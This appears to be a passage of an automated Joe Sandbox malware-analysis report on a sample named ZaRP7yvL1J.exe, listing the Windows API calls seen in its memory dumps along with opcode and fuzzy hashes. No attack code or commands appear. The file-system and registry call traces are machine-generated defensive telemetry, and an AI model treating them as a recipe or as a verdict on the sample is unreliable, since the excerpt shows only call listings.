                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Enum$CloseValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 397863658-0
                                                                                                            • Opcode ID: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction ID: 69a0bd767b5398a5b54c194fc83da7942780fa4e63ecbf8b5358c30743fc2944
                                                                                                            • Opcode Fuzzy Hash: 962e8dbebea2d0e856bbe812d5e95e45bdf7d67f5620c7d5b12d357826d7025c
                                                                                                            • Instruction Fuzzy Hash: 4B017171904204ABEB149F95DE88ABF7AB8EF80348F10403EF505B61D0DAB85E419B69
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
                                                                                                            • Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
                                                                                                            • Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,74DF2EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                                              • Part of subcall function 0040591F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00436000,?,00000000,000000F0), ref: 0040164D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 1892508949-0
                                                                                                            • Opcode ID: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction ID: 0139da5d792eeb989572d84d187c25f91b4f70b2bd1842bf542401118de2a59f
                                                                                                            • Opcode Fuzzy Hash: c670449cb20163be3cb3cb34affd8c81282aa0e3ca4a40f31796d9e50139b1da
                                                                                                            • Instruction Fuzzy Hash: 0511E631504511EBCF30AFA4CD4159F36A0EF15329B29453BFA45B22F1DB3E49419B5D
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nszB803.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3356406503-0
                                                                                                            • Opcode ID: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
                                                                                                            • Opcode Fuzzy Hash: 63b64fe82c2f511c8169af5ec8c0190f19a921c94039209ad64b866aaad41420
                                                                                                            • Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
                                                                                                            APIs
                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
                                                                                                            • Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
                                                                                                            • Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
                                                                                                            APIs
                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004023B9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 2831762973-0
                                                                                                            • Opcode ID: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
                                                                                                            • Opcode Fuzzy Hash: a00859f013a8106156cc87040160a2b11e5294e3cc8a521d5b70861134e176e9
                                                                                                            • Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                            • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                              • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                              • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                              • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                            • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                            • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\ZaRP7yvL1J.exe,80000000,00000003), ref: 00405EE2
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                            • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                            • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004059A2
                                                                                                            • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004059B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                            • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                            • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNELBASE(00000000), ref: 6F952B6B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2401686688.000000006F951000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F950000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2401644043.000000006F950000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401702628.000000006F954000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2401785461.000000006F956000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_6f950000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: 0c9541c8443b35ca59012a6c84294775a1a7c22ad623acf4f80e031b501ccdb8
                                                                                                            • Instruction ID: fe1648a777a3cad0a425fde8f45a96f4b5d533f918882ca6c2eed269ad615847
                                                                                                            • Opcode Fuzzy Hash: 0c9541c8443b35ca59012a6c84294775a1a7c22ad623acf4f80e031b501ccdb8
                                                                                                            • Instruction Fuzzy Hash: 9B416FB1808704DFEF20DFB8D981B593768EB5637CF204466E5089A2C2D734E8B98F91
                                                                                                            APIs
                                                                                                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileMove
                                                                                                            • String ID:
                                                                                                            • API String ID: 3562171763-0
                                                                                                            • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                            • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                            • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                            • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                            • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Create
                                                                                                            • String ID:
                                                                                                            • API String ID: 2289755597-0
                                                                                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                            • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363002050.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2363068605.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ZaRP7yvL1J.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                            • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040FAC2,0040CED0,004033DE,0040CED0,0040FAC2,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2362970731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2362935906.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2362987698.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
